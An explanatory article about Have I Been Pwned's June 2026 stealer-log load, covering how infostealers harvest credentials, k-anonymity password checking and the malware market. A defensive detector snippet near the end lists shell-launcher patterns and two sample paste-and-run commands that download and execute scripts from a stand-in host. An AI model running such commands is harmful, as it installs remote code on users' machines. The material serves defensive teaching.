124 million passwords just landed in Have I Been Pwned, and no company lost them

On 15 June 2026, the breach-notification service Have I Been Pwned took in a corpus of 56.3 million unique email addresses and 124 million unique passwords, pulled out of hundreds of millions of individual stealer-log records. Troy Hunt, who runs the service, logged the entry under a deliberately flat name: June 2026 Stealer Logs. The passwords were folded into Pwned Passwords, the companion database that lets anyone check whether a given password has already turned up in a known compromise. Around 86% of the email addresses had been seen in HIBP before, carried over from earlier incidents, which leaves a smaller slice of first-seen addresses and a blunt reminder that the same stolen data keeps recirculating through the criminal supply chain.

The credentials in this dataset were stolen one device at a time

The detail that makes this entry worth a closer look is its origin. Most records in HIBP trace back to a single event with a clear victim organisation. A company is attacked, an internal database is copied, and the personal records of everyone inside that database spill out together. Ashley Madison, Dropbox, LinkedIn, Adobe: each is a named breach of a named service, and the people exposed share one thing, which is that they all had accounts on that platform. This dataset works the other way around. The credentials were not lifted from one company’s servers. They were taken directly from the personal computers and devices of the people who own them, one infected machine at a time, by malware quietly recording what its victims typed.

That distinction changes who is at fault, who can fix it, and how the exposure plays out. When a service is breached, the operator carries the burden. The company must disclose, reset credentials, and absorb the regulatory and reputational damage, while affected users are mostly passengers. With a stealer-log corpus, there is no central operator to blame and no single password reset that closes the hole. The compromise sits on the victim’s own device: their browser, their saved logins, their session tokens. If the malware is still running, changing a password simply hands the attacker the new one as soon as it is typed.

Hunt has loaded several of these stealer corpora over the past two years, and the June 2026 set fits a pattern he has described repeatedly. These are not tidy, one-time breaches. They are aggregations, assembled by people who scrape Telegram channels, dark-web forums and Tor marketplaces where infostealer output is traded and dumped. The “hundreds of millions of records” figure refers to raw rows. After normalising and deduplicating that flood, what survived as distinct items was 56.3 million email addresses and 124 million passwords. Those are the numbers that matter, because raw row counts in this corner of the internet are almost always inflated by duplication.
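The gap between raw rows and unique items is easier to see in miniature. The sketch below is illustrative only: the `url|email|password` row layout and the normalisation rules (trim whitespace, lower-case the address) are assumptions, real stealer output varies by malware family, and nothing here describes HIBP’s actual pipeline.

```python
def dedupe_rows(rows):
    """Reduce raw stealer-log rows to unique emails and unique passwords.

    Assumes a hypothetical 'url|email|password' layout, one record per row.
    """
    emails, passwords = set(), set()
    for row in rows:
        parts = row.strip().split("|", 2)
        if len(parts) != 3:
            continue  # skip malformed rows rather than guess at their meaning
        _url, email, password = parts
        email = email.strip().lower()  # treat case variants as one address
        if "@" in email:
            emails.add(email)
        if password:
            passwords.add(password)  # passwords are case-sensitive: no folding
    return emails, passwords


# Made-up sample rows on reserved example domains.
raw_rows = [
    "https://bank.example/login|Alice@Example.com|Summer2024!",
    "https://mail.example/|alice@example.com|Summer2024!",
    "https://work.example/sso|alice@example.com|Tr0ub4dor&3",
    "https://bank.example/login|Alice@Example.com|Summer2024!",  # exact repeat
    "not a credential row",
]

emails, passwords = dedupe_rows(raw_rows)
print(len(raw_rows), "raw rows ->", len(emails), "emails,", len(passwords), "passwords")
```

Five rows collapse to one address and two passwords, which is the same effect, at toy scale, that shrinks hundreds of millions of rows to the published unique counts.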

For an individual, the practical takeaway is narrow and concrete. If your email address appears in the June 2026 stealer logs, the realistic assumption is that one of your devices was infected at some point, and that the passwords saved in your browser at the time are now in criminal hands. That is a heavier conclusion than “a website I used got hacked.” It points at the machine in front of you rather than at a distant company, and it raises the possibility that the same malware also grabbed session cookies, autofill data and authentication tokens that a password change alone will not neutralise.

The data also sits inside a noisy month. Around the same window, security researchers reported a separate trove of roughly 24 billion records sitting on an exposed, unsecured database, much of it infostealer output enriched with vulnerability data to help attackers prioritise targets. The two events are not the same, and conflating them is exactly the kind of mistake that produces misleading “16 billion passwords leaked” headlines. What HIBP added on 15 June is a specific, deduplicated, checkable corpus. The broader point both events make together is that credential theft has shifted decisively from breaking into companies toward harvesting individuals, and the volume now moving through that channel is large enough that most regular internet users have at least one credential somewhere in it.

This article works through what that shift means in detail: what a stealer log actually holds, how the malware gets onto a machine, why saved browser passwords and session cookies are the prize, how the stolen data is priced and sold, what the numbers do and do not prove, and what an individual or an organisation can realistically do once the credentials are already out.

Inside a single stealer log

A stealer log is the output file a piece of information-stealing malware produces after it has finished going through an infected machine. It is not a hacking tool in the cinematic sense. It is closer to an automated clerk that opens every drawer on a computer, copies anything that looks like a credential, and ships the bundle back to whoever deployed it. To understand the June 2026 dataset, it helps to picture what one of these logs contains for a single victim.

At the centre are saved browser credentials: the email addresses, usernames and passwords stored in Chrome, Edge, Firefox or any Chromium-based browser, each one paired with the website it unlocks. This pairing is what gives stealer logs their edge over older credential dumps. A traditional combo list might tell an attacker that the password “Summer2024!” belongs to a given email address. A stealer log tells them that the same password was entered at a specific bank, a specific email provider and a specific work portal, because the malware recorded the URL alongside the credential. That removes the guesswork. The criminal does not have to spray the password across the internet hoping for a hit. They already know where it works.
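The difference between the two record shapes can be shown as a small data-structure sketch. The class names, field names and sample values are hypothetical, chosen only to illustrate the pairing described above; real logs differ in layout from family to family.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ComboEntry:
    """Older combo-list record: a credential with no destination attached."""
    email: str
    password: str


@dataclass(frozen=True)
class StealerEntry:
    """Stealer-log record: the same credential plus the URL it was saved for."""
    url: str
    email: str
    password: str


def sites_by_credential(entries):
    """Group URLs under each (email, password) pair found in a log."""
    grouped = defaultdict(list)
    for entry in entries:
        grouped[(entry.email, entry.password)].append(entry.url)
    return dict(grouped)


# Made-up entries on reserved example domains.
log = [
    StealerEntry("https://bank.example/login", "alice@example.com", "Summer2024!"),
    StealerEntry("https://mail.example/", "alice@example.com", "Summer2024!"),
    StealerEntry("https://portal.work.example/sso", "alice@example.com", "Summer2024!"),
]

combo = ComboEntry("alice@example.com", "Summer2024!")
targets = sites_by_credential(log)[(combo.email, combo.password)]
print(targets)
```

The combo entry says only that the pair exists. The grouped stealer entries say which three sites it opens, which is also the list a victim would need in order to rotate the right credentials.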

Around that core sits a wider haul. Modern stealers routinely grab browser cookies and active session tokens, autofill data, saved payment-card details, cryptocurrency wallet files, and the seed values used by some authenticator apps. They fingerprint the machine: the operating system, hardware identifiers, installed software, the victim’s country, the IP address. One analysis of tens of millions of these packages in 2025 found that the vast majority contained active passwords and that almost all of them recorded the exact URLs where credentials were used, alongside hardware IDs, email addresses, VPN configurations, SSH keys and cloud tokens. A single log is, in effect, a complete portrait of a person’s digital life at the moment of infection.

The cookies deserve particular attention, because they are the element that turns a password leak into something more dangerous. A session cookie is the small token a website hands your browser after you log in, so that you do not have to re-authenticate on every page. If a stealer captures a live session cookie, an attacker can import it into their own browser and step straight into the victim’s authenticated session, often without needing the password at all and without triggering a second-factor prompt. That is why security teams treat stealer logs as more severe than ordinary breach data. The log can carry the keys, the address, and a pass that lets the holder skip the lock entirely.

There is a structure to how these logs look in the wild. Many carry the branding of the malware that produced them, with the family’s logo stamped at the top of the information file, which is why researchers can often identify whether a given log came from RedLine, StealC or another tool. Each log is typically saved with a country code and a hardware identifier for the infected device, then bundled into archives that get passed around in channels and marketplaces. A single batch traded on Telegram can run to tens of gigabytes and contain logs from a great many separate victims, which is how “hundreds of millions of records” accumulate.

The mental shift that matters most is this. A stealer log is evidence that a specific person’s device was compromised, not that a specific company was. When your address appears in a corpus like the June 2026 set, the most accurate reading is not “one of the sites I use leaked my data.” It is “at some point, malware ran on a machine I was using, and it copied whatever I had saved.” That is a more uncomfortable thought, and it points the remediation effort somewhere most people never look: at their own endpoint, the device itself, rather than at the long list of online services they hold accounts with.

The line between a corporate breach and an infected laptop

The reason this dataset reads differently from a routine breach notification comes down to a single question: whose failure put the data there. In the breach model that most people carry in their heads, the failure belongs to a company. An attacker finds a way into a corporate network or a misconfigured cloud bucket, copies a customer database, and the people in that database are exposed through no action of their own. The remedy is institutional. The company resets passwords, notifies regulators, offers credit monitoring, and the affected users wait for instructions. Responsibility and repair both sit on the organisation’s side of the line.

Stealer logs collapse that arrangement. The point of compromise is the victim’s own device, and the data exposed is whatever that person had saved across every service at once, not the records held by any one provider. There is no breached company to disclose, no central reset that fixes the problem, and no regulator with a clear party to penalise. The malware does not care which sites the victim uses; it takes everything in the browser and everything it can reach on the disk. A single infection can therefore expose a banking login, a work email, a gaming account and a healthcare portal in the same file, because all of those credentials lived in the same browser profile.

This is why a stealer-log corpus tends to be broader and more intimate than a single-service breach of the same headline size. A breach of a retailer exposes the people who shopped at that retailer, and usually a defined set of fields: name, email, maybe a hashed password and an address. A stealer log exposes the full credential set of each infected person, drawn from dozens of unrelated services, with plaintext passwords and the exact URLs attached. One stolen log can be more useful to an attacker than a million records from a typical breach, because it is pre-sorted, plaintext, and tells the criminal precisely where each credential works.

It also reframes the meaning of strong security hygiene at the service level. A company can do everything right, hash its passwords properly, enforce two-factor authentication, run a clean infrastructure, and still see its users’ accounts taken over, because the credentials were never stolen from the company. They were stolen from the user’s infected machine before they ever reached the company’s login page. The Verizon Data Breach Investigations Report has been blunt about this dynamic, noting that organisations cannot guarantee their customers are free of infostealers, since there is no way to force a customer to patch their operating system or run antivirus. The recommended posture is to assume some fraction of any user base is already compromised at the endpoint and to design access controls accordingly.

There is a second-order effect on attribution that matters for anyone trying to interpret the news. When a stealer-log dataset surfaces, it is common to see panicked reports framing it as a breach of a major provider, because the logs contain credentials for that provider’s domain. In October 2025, a wave of coverage claimed a mass “Gmail breach” affecting millions, when the underlying reality was that infostealer logs naturally contain Gmail credentials, since Gmail is one of the most widely used services on earth. Google pushed back directly, explaining that the alarm came from a misreading of credential-theft database updates rather than any single attack on its systems. The presence of a domain in a stealer corpus says the domain’s users were infected, not that the domain was hacked. That is a distinction the headlines routinely lose, and losing it sends people chasing the wrong fix.

The honest framing of the June 2026 dataset is therefore narrower and more useful than “124 million passwords leaked.” It is a deduplicated aggregation of credentials harvested from a very large number of individually infected devices, made checkable so that victims can learn their exposure and act on it. The fault did not sit with a company. It sat, in each case, with a compromised endpoint, and that is where the meaningful response has to begin.

Have I Been Pwned and the engineer who built it

Have I Been Pwned exists because one person kept noticing the same problem. Troy Hunt, an Australian security developer and a former Microsoft Regional Director and MVP, built the site in late 2013 after the Adobe breach exposed tens of millions of customer accounts. He had been doing post-breach analysis of leaked credentials and kept finding the same email addresses turning up across multiple incidents, frequently with the same passwords, which meant a single exposed credential could unlock a string of unrelated accounts. The site started as a free, deliberately simple way for anyone to check whether their email address appeared in known breaches, and it grew from there.

More than a decade on, the service has loaded over a thousand distinct breaches and tracks well over fifteen billion compromised accounts. It has become part of the plumbing of consumer security rather than a niche curiosity. Browsers, password managers and identity platforms query its data behind the scenes; national computer emergency response teams in dozens of countries use its free government service to monitor their own official domains against new breaches, with more than forty governments onboarded. The model has stayed close to its origins: free for individuals to check their own exposure, with paid API tiers for organisations that need to monitor domains at scale, and the running costs carried in large part by infrastructure partners.

What gives HIBP its authority is not size alone but the verification discipline behind each load. Hunt does not simply ingest any file handed to him and publish it. Before a dataset goes live, he tries to confirm it is real and not a recycled compilation masquerading as something new. A recurring step is to take a sample of the email addresses and run them against the existing HIBP corpus to see how many have been seen before. A very high crossover, in the high eighties or low nineties as a percentage, is a signal that the data is largely old material repackaged. He also contacts a handful of affected subscribers and asks them to confirm whether the exposed passwords were ones they actually used, including whether they were current or long retired. Only when the data checks out does it get loaded, and that gatekeeping is a large part of why a HIBP entry carries more weight than a sensational forum post claiming billions of new records.
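The crossover check is simple to express. The following is a minimal sketch of the idea rather than Hunt’s actual tooling: the function name, the sample size and the in-memory set standing in for the existing corpus are all assumptions.

```python
import random


def crossover_rate(new_emails, known_emails, sample_size=1000, seed=0):
    """Estimate the share of a new corpus already present in a known set.

    known_emails is assumed to be a set of lower-cased addresses.
    """
    pool = sorted({e.strip().lower() for e in new_emails})
    if not pool:
        raise ValueError("new corpus is empty")
    rng = random.Random(seed)  # fixed seed so the estimate is repeatable
    sample = rng.sample(pool, min(sample_size, len(pool)))
    seen = sum(1 for e in sample if e in known_emails)
    return seen / len(sample)


# Toy data: 86 of 100 incoming addresses are already known.
known = {f"user{i}@example.com" for i in range(86)}
incoming = [f"user{i}@example.com" for i in range(100)]

rate = crossover_rate(incoming, known)
print(f"{rate:.0%} of sampled addresses were already known")
```

A result in the high eighties or above, as in this toy data, would suggest mostly recycled material. A markedly lower figure would point to a larger share of first-seen addresses.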

The stealer-log work specifically has pushed the service into new territory. Loading credentials harvested from infected devices raised a practical problem: people who found their address in a stealer corpus had no way to learn which site the credential was taken from or which password was affected, which made the notification frustrating and hard to act on. In response, HIBP built features that let verified users see the specific domains their address appeared against in the logs, and let domain owners query the stealer data for their own users through an API. That turned a vague “you appear in some stealer logs” alert into actionable detail: this address showed up against these sites, so rotate those credentials.

It is worth being clear-eyed about the limits, because Hunt himself is. HIBP does not contain every stolen credential in the world, and an absence from its database is not a clean bill of health. The service can only index data that reaches it and that it can verify. Plenty of stealer output never makes it into a public channel, sits in private paid groups, or is held by criminals who have no reason to dump it. A negative result means your address has not turned up in the breaches and corpora HIBP has loaded, not that your credentials are safe. The service is a powerful early-warning system and a genuine public good, but it is one signal among several, and treating it as the definitive verdict on personal exposure overstates what any single database can do.

Pwned Passwords and the k-anonymity trick behind safe checking

The 124 million passwords from the June 2026 corpus went into Pwned Passwords, a part of HIBP that deserves its own explanation because it solves a problem most people never think about. Checking whether a password has been compromised sounds simple, but doing it without creating a new risk is genuinely hard. If you send your password to a server to ask “has this leaked?”, you have just handed your live password to a third party. Even sending a full hash is risky, because a determined operator could crack common hashes or log them. The whole point is undermined if the check itself leaks the secret.

Pwned Passwords gets around this with a method called k-anonymity, an idea contributed by Junade Ali while at Cloudflare. The mechanism is elegant. Your software hashes the password locally using SHA-1, then sends only the first five characters of that hash to the API. The server responds with the suffix of every hash it holds that begins with those five characters, along with a count of how many times each appeared in breaches. Your software then checks, locally, whether the remaining 35 characters of your hash are anywhere in that list. The full password never leaves your device, and neither does its full hash. The server only ever sees a five-character prefix that could belong to hundreds of different passwords, so it cannot know which one you were actually checking.
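The exchange can be sketched in a few lines of Python. This is a minimal illustration, not an official client: the function names and the User-Agent string are invented, the demonstration runs against a made-up response body rather than the live service, and the counts in that body are fabricated for the example. The range endpoint URL and the `SUFFIX:COUNT` line format follow the public Pwned Passwords API.

```python
import hashlib
import urllib.request

RANGE_URL = "https://api.pwnedpasswords.com/range/"


def split_hash(password):
    """Return (prefix, suffix) of the upper-case SHA-1 hex digest."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def count_in_range(suffix, range_body):
    """Look for our suffix in a range response of 'SUFFIX:COUNT' lines."""
    for line in range_body.splitlines():
        candidate, _, count = line.strip().partition(":")
        if candidate.upper() == suffix:
            return int(count)
    return 0  # suffix absent: not in the corpus behind this response


def fetch_range(prefix):
    """Network call: only the 5-character prefix is ever sent."""
    req = urllib.request.Request(
        RANGE_URL + prefix, headers={"User-Agent": "k-anon-sketch"}
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


def pwned_count(password, fetch=fetch_range):
    """Hash locally, fetch one bucket, compare the suffix locally."""
    prefix, suffix = split_hash(password)
    return count_in_range(suffix, fetch(prefix))


# Offline demonstration with a made-up response body (counts are invented).
prefix, suffix = split_hash("password")
fake_body = "0018A45C4D1DEF81644B54AB7F969B88D65:3\r\n" + suffix + ":42\r\n"
print(prefix, pwned_count("password", fetch=lambda p: fake_body))
```

Passing the fetch step in as a parameter keeps the comparison logic testable without touching the network. Calling `pwned_count("some password")` with the default argument would query the live service, sending only the five-character prefix.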

The numbers behind this are reassuring. Splitting hashes by a five-character prefix produces just over a million possible buckets, and each bucket on a half-billion-password dataset returns several hundred suffixes on average, enough collisions that the prefix tells an eavesdropper essentially nothing about the source password. The use of SHA-1 here often draws objections from people who know it is cryptographically broken for collision resistance, but those objections miss the purpose. SHA-1 is not protecting the password here; it is a fast, uniform way to bucket the data and to obscure any malformed input that slipped into the corpus. The anonymity comes from the prefix model, not from the strength of the hash.
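The arithmetic is quick to reproduce. The corpus size below is the round half-billion figure from the paragraph above, not a current count, and the average assumes hashes spread evenly across prefixes, which is what a hash function is designed to approximate.

```python
HEX_ALPHABET = 16          # characters 0-9 and A-F
PREFIX_LENGTH = 5          # characters of the SHA-1 hash sent to the API
CORPUS_SIZE = 500_000_000  # round "half-billion-password" figure, an assumption

buckets = HEX_ALPHABET ** PREFIX_LENGTH
avg_suffixes = CORPUS_SIZE / buckets

print(f"{buckets:,} buckets, about {avg_suffixes:.0f} suffixes per bucket")
```

That works out to 1,048,576 buckets and roughly 477 suffixes in each, so a larger corpus only makes the crowd behind any given prefix bigger.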

The scale at which this now operates is striking. Pwned Passwords handles enormous query volumes, well into the billions of requests per month, delivered through Cloudflare’s global edge network with a cache-hit ratio above 99.9% across hundreds of edge locations in well over a hundred countries. During one thirty-day window in late 2025, the service served more than seventeen billion requests, averaging thousands per second with peaks tens of thousands higher in any given minute. A check that started as a niche developer tool is now baked into browsers, password managers and sign-up forms across the internet, quietly screening passwords against known-bad lists at a rate that would have seemed absurd a few years ago.

This matters because it operationalises a recommendation that security standards bodies have been making for years. The United States National Institute of Standards and Technology, in its digital identity guidance, advises that when someone sets or changes a password, the service should check it against lists of values known to be commonly used, expected or compromised, and refuse the ones that appear. Pwned Passwords is the most widely used way to put that advice into practice without building and maintaining a breach corpus yourself. A service can call the k-anonymity API at the moment a user picks a password and block anything already known to be exposed, which closes off the single most exploited weakness in password security: people choosing passwords that are already in the attackers’ dictionaries.
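A sign-up or password-change handler that follows this advice might look roughly like the sketch below. It is an assumption-laden illustration: the function names, the eight-character minimum and the stand-in lookup table with its counts are invented for the example, and a real service would replace `demo_lookup` with a query against a breach corpus such as the k-anonymity API.

```python
def screen_new_password(password, breach_count, min_length=8):
    """Return (accepted, reason) for a password chosen at sign-up or reset.

    breach_count is any callable returning how many times the password
    appears in a compromised-password list (0 means not found).
    """
    if len(password) < min_length:
        return False, f"shorter than {min_length} characters"
    hits = breach_count(password)
    if hits > 0:
        return False, f"found in known-compromised list ({hits} times)"
    return True, "ok"


# Stand-in lookup for demonstration only; the counts are invented.
KNOWN_BAD = {"Summer2024!": 1200, "password": 9_000_000}


def demo_lookup(password):
    return KNOWN_BAD.get(password, 0)


print(screen_new_password("Summer2024!", demo_lookup))
print(screen_new_password("vX9#qLm2&tRz8!pK", demo_lookup))
```

The first call is rejected even though the password satisfies typical complexity rules, because appearing in a known-compromised list is what disqualifies it. The second passes.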

For the June 2026 dataset, the practical effect is immediate. Any password from those 124 million is now flagged the instant it is checked, whether by an individual using the website, a password manager auditing a vault, or a service screening new sign-ups. A password that appears in Pwned Passwords should be treated as burned. Not “probably fine because the breach was old,” not “acceptable because it is long and complex,” but burned, because its appearance in the corpus means it is sitting in a list that attackers feed into automated login attempts. The strength of the password is irrelevant once it is known. A long, random, genuinely strong password that has leaked is more dangerous than a mediocre one that has not, because the attacker no longer has to guess it.

There is a quieter benefit worth noting. Because the data also flows from sources such as a feed of newly seen passwords supplied by the FBI, Pwned Passwords keeps absorbing fresh material rather than freezing at a single snapshot. That keeps the screening current, so a password that becomes compromised this month can be caught soon after, rather than only being recognised years later when some historical dump finally surfaces.

Reading the 124 million figure without the hype

Large round numbers in breach coverage invite a specific kind of misreading, and the June 2026 dataset is a good case study in how to interpret them honestly. The headline is 124 million passwords. The first thing to be precise about is what that count actually is. It is 124 million unique passwords, deduplicated from hundreds of millions of raw stealer-log rows, added to the Pwned Passwords database. It is not 124 million people, and it is not 124 million accounts. The companion figure, 56.3 million unique email addresses, is closer to a count of affected identities, though even that overstates distinct humans because one person often appears under several addresses.

The second point of precision concerns the word “new.” A dataset can be new to HIBP without the credentials inside it being freshly stolen. Hunt has made this point so often it has become a refrain: “new to HIBP” does not mean “a brand-new breach.” Stealer logs in particular are recirculated endlessly, merged, repackaged and redumped across channels, so a corpus that lands today can be largely composed of material that has been in criminal hands for months or years. The crossover statistic for the June 2026 set, with around 86% of the email addresses already present in HIBP, is direct evidence of exactly this. The genuinely first-seen portion is real and worth knowing about, but it is a fraction of the headline, not the whole of it.
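The size of that fraction follows directly from the two published figures. Because the 86% is itself approximate, the result below is an estimate rather than a reported count.

```python
unique_emails = 56_300_000   # unique addresses in the June 2026 load
previously_seen = 0.86       # "around 86%", so the result is approximate

first_seen = unique_emails * (1 - previously_seen)
print(f"about {first_seen / 1e6:.1f} million first-seen addresses")
```

That puts the first-seen portion at something close to 7.9 million addresses, against a headline of 56.3 million.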

Recent large credential datasets added to Have I Been Pwned

| Dataset | Added | Unique emails | Passwords to Pwned Passwords | Origin |
| --- | --- | --- | --- | --- |
| Stealer Logs (Jan 2025) | Jan 2025 | 71M | 106M | Infostealer logs, Telegram |
| ALIEN TXTBASE | Feb 2025 | 284M | 244M new | Infostealer logs, Telegram |
| Synthient Stealer Log | Oct 2025 | 183M | part of corpus | Infostealer logs, aggregated |
| Synthient Credential Stuffing | Nov 2025 | ~2,000M | ~1,300M | Recycled breach combo lists |
| June 2026 Stealer Logs | Jun 2026 | 56.3M | 124M | Infostealer logs, aggregated |

These figures show how much credential data has moved through HIBP in eighteen months and how the origin type splits between live infostealer output and recycled combo lists. The deduplicated unique counts, not the raw row counts, are the meaningful measure.

The third point is comparison. Set against the other entries of the past year and a half, the June 2026 set is sizeable but far from the largest. The ALIEN TXTBASE corpus in February 2025 carried 284 million unique addresses across some 23 billion rows and added 244 million previously unseen passwords. The Synthient credential-stuffing dataset in November 2025 reached nearly two billion unique addresses and around 1.3 billion passwords. Against that backdrop, 124 million passwords is a serious but routine entry, not an unprecedented event, which is precisely why sober coverage matters more than alarm.

None of this is meant to minimise the dataset. The deflationary points about counts and novelty are not reasons to ignore it. They are the opposite: they tell you that the real risk is structural rather than tied to this one corpus. The credentials in the June 2026 set sit inside a continuous stream of stolen logins that keeps flowing regardless of which particular batch happens to be loaded this week. If your address is in this one, it may well be in others, and the meaningful question is not “how big was this specific dataset” but “is my credential reuse and my device hygiene leaving me exposed to the whole stream.” The number is a prompt to check and act, not a measure of how worried to be on any given day.

The infostealer as a business rather than a one-off hack

The instinct to picture a hacker behind every breach gets in the way of understanding stealer logs, because the people who built the malware are usually not the people who use it, and neither group is doing anything that resembles a targeted attack. The infostealer world runs as a commercial market with the structure of a software business. Developers write and maintain the malware, then rent it out as a subscription product, complete with management panels, customer support, regular feature updates and tiered pricing. The industry term for this is malware-as-a-service, and it has turned credential theft from a specialist craft into something a low-skilled criminal can buy off the shelf.

The pricing makes the point. A leading stealer has typically been offered at a few hundred dollars a month for the standard package, scaling up to roughly a thousand dollars for premium builds with stronger evasion, and in some cases a flat five-figure payment for source-code access and the right to resell. Newer entrants have undercut the established names, with commercial stealers appearing through 2025 at prices from under a hundred dollars to a few hundred per month. For the cost of a mid-range phone, a buyer gets working malware, a dashboard to track their infections, and tools to organise and sell the stolen data. That accessibility, more than any single technical breakthrough, is why the volume of stolen credentials has climbed so steeply.

The market has its own division of labour, which researchers who monitor it have mapped in detail. At the top sit the developers and primary sellers, who run the malware and operate public channels advertising it alongside private paid groups for clients. Below them are aggregators, who collect logs from many sources and republish them, often to build a reputation or draw attention to a paid service. Then come the traffers, who do not sell logs themselves but specialise in spreading the malware, driving traffic to malicious downloads in cooperation with the sellers and taking a cut of what they harvest. Telegram sits at the centre of all of it, functioning as the marketplace, the distribution channel and the dumping ground at once; monitoring of the ecosystem found single Telegram accounts capable of ingesting tens of millions of credentials in a single day.

This structure explains why takedowns, however real, do not end the problem. When law enforcement disrupts one family, the demand for stolen logins does not disappear, and a market that lets a new brand launch for a few hundred dollars simply routes around the gap. Cheaper rivals are already advertising before the dust settles. Each disruption raises costs and buys defenders time, but it does not retire the business model, because the economics keep pulling new suppliers in. Stolen credentials hold their value for months and can be resold repeatedly, which gives infostealers a return on investment that other categories of malware struggle to match. Ransomware needs negotiation; cryptojacking yields pennies; an infostealer produces reusable, resellable access.

The data flow that ends in a HIBP load is therefore the tail end of a long commercial pipeline. A traffer lures a victim into running a malicious file. The stealer harvests the device and sends the log back to the operator. The operator sells or dumps it, possibly several times over, on Telegram and in marketplaces. Aggregators scoop it up, merge it with other batches, and recirculate it. A threat-intelligence researcher monitoring those channels collects the aggregated output, deduplicates it, and eventually shares a cleaned corpus with a service like HIBP. By the time a dataset becomes checkable, the criminals have usually had months to exploit it, which is one reason a notification can feel like old news even when the load is recent.

Understanding the market also reframes who the victims are. Because the malware is sprayed indiscriminately by traffers chasing volume, infection is rarely personal. The people in the June 2026 corpus were almost never singled out. They downloaded the wrong installer, clicked the wrong link, or ran a cracked program, and the malware took whatever it found. That randomness is small comfort, but it does shape the right response. The threat is environmental, not adversarial, which means the defence is about reducing the chance of infection and limiting the blast radius when it happens, rather than about outsmarting a specific attacker who has chosen you.

Malware families feeding the logs

HIBP did not name the specific malware behind the June 2026 corpus, and that reticence is normal. Aggregated stealer datasets are assembled from many sources and many families at once, so attributing a deduplicated blend to a single tool would be misleading. What can be said is which families have dominated the market that produces these logs, because the corpus is the combined exhaust of that market rather than the work of one program.

For much of 2024 and into 2025, Lumma, also known as LummaC2, was the most prolific stealer in circulation. It spread heavily through game cheats and cracked software, used anti-sandbox tricks including a method that watches cursor movement to detect whether it is running in front of a real human, and was sold through the tiered subscription model that has become standard. Its reach was large enough that Microsoft’s Digital Crimes Unit, working with Europol, the FBI and the United States Department of Justice, ran a coordinated disruption in May 2025, sinkholing close to 394,000 infected hosts and seizing around 2,300 domains. The operation worked, in the sense that it knocked Lumma’s infrastructure offline, and it did not work, in the sense that the malware recovered within weeks as new command-and-control endpoints appeared. By early 2026 it was back at scale.

The takedown story repeats across the category. RedLine, which held a top-three position for years and was famous for the logos it stamped on its log files, was the target of Operation Magnus in October 2024 and declined afterward, though its old logs keep circulating and remain a live credential threat. Through 2025, multiple phases of Operation Endgame targeted the infrastructure behind LummaC2 and Rhadamanthys, with results that by the end of the year appeared to have meaningfully cut their operations. Every disruption clears space, and a successor fills it. When RedLine fell, the field reshuffled toward Lumma; when Lumma was hit, rivals such as Vidar and StealC absorbed the displaced demand.

The current top tier reflects that churn. As of early 2026, the most actively distributed families included LummaC2, ACRStealer, StealC and Vidar, according to malware-trend tracking. StealC has risen sharply on the strength of an aggressive release cadence: it pushes new features frequently, offers free testing periods and unusually responsive support on criminal forums, and shipped a second major version in 2025 that added encrypted command-and-control and quieter behaviour designed to slip past endpoint detection. Vidar, one of the more veteran families and a fork of the older Arkei stealer, was rewritten for stealth in 2025 and is notable for abusing legitimate platforms such as Telegram and social-media services to host its configuration and exfiltration channels, which helps it blend into ordinary network traffic. It was also among the first stealers to target two-factor authentication seed values.

The market is not limited to Windows, and this is a point many users get wrong. macOS now has its own active stealer families, including Atomic, Poseidon, Odyssey and MacSync, several of which spread through the same paste-and-run lures used against Windows. One macOS-only stealer was offered with licences in the low thousands of dollars, priced as a premium product precisely because Apple users skew toward higher-value targets such as developers and executives. The belief that a Mac is inherently safe from this category is outdated; the volume is lower than on Windows, but the threat is real and growing.

What ties the families together is consistency of purpose despite cosmetic differences. Each targets browser credential stores, cookies, autofill data, cryptocurrency wallets and authentication artefacts. Each is sold as a service. Each is distributed through whatever lure is converting at the moment. The specific brand behind any given log matters far less than the fact that the whole market is engineered around one goal: scooping saved credentials off ordinary machines and turning them into a sellable commodity. The June 2026 dataset is what that goal looks like at scale, expressed as a single deduplicated file.

Infection usually starts with a click, not a break-in

The mental image of malware sneaking through some hidden flaw in your system is mostly wrong for this category. Infostealers overwhelmingly get onto a machine because the person at the keyboard runs something they should not have. The delivery is social, not technical, and the lures are tuned to the moments when people lower their guard. Understanding those moments is the single most useful piece of prevention, because the infection is almost always invited in.

The most prominent technique of 2025 went by several names: ClickFix, FakeCAPTCHA, or simply paste-and-run. The victim lands on a page that presents what looks like a routine verification step or an error to fix, and is instructed to copy a snippet of text and paste it into a system dialog such as the Windows Run box or a terminal. The snippet is a command that quietly downloads and executes a loader, which then drops the stealer. It works because it weaponises the user’s own willingness to follow instructions, and because the action happens outside the browser’s protections, in a system prompt the browser cannot police. The bulk of attempted delivery for the dominant stealer of the period leaned on exactly this kind of copy-and-paste manipulation.
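The shape of a paste-and-run lure is regular enough to sketch as a check. The snippet below is a deliberately naive illustration, not a real detector: the pattern lists and the function name `looks_like_paste_and_run` are assumptions made for this example, and a determined attacker could evade them easily. It flags text that both invokes a shell or download tool and points at a remote URL, which is the combination the lures described above rely on.

```python
import re

# Assumed, illustrative patterns: common shells and download tools.
LAUNCHERS = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|bash|sh|curl|wget)\b", re.IGNORECASE
)
# Any reference to a remote web address.
REMOTE = re.compile(r"https?://", re.IGNORECASE)


def looks_like_paste_and_run(text):
    """True when the text invokes a launcher AND references a remote URL."""
    return bool(LAUNCHERS.search(text)) and bool(REMOTE.search(text))


samples = [
    'powershell -w hidden -c "iwr https://bad.example/a.ps1 | iex"',
    "curl -s https://bad.example/install.sh | sh",
    "Verification code: 48213",
    "Visit https://example.com/help to reset your password",
]
for sample in samples:
    print(looks_like_paste_and_run(sample), "|", sample)
```

The useful habit is the human version of the same check: a "verification" step that asks for a command to be pasted into a Run box or terminal is not verification.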

The older routes remain busy. Cracked software and game cheats are a perennial favourite, because someone who has decided to run an unlicensed, unsigned executable from an untrusted source has already accepted the exact risk the malware needs. Pirated applications, key generators, and “free” versions of paid tools are ideal carriers. So are fake installers and updates: a page mimicking a legitimate download for a popular application, or a pop-up claiming a browser or media plugin needs updating, delivering the stealer instead of the real thing. Malvertising sits alongside these, planting malicious ads that lead to poisoned downloads, sometimes on sites that are themselves entirely reputable.

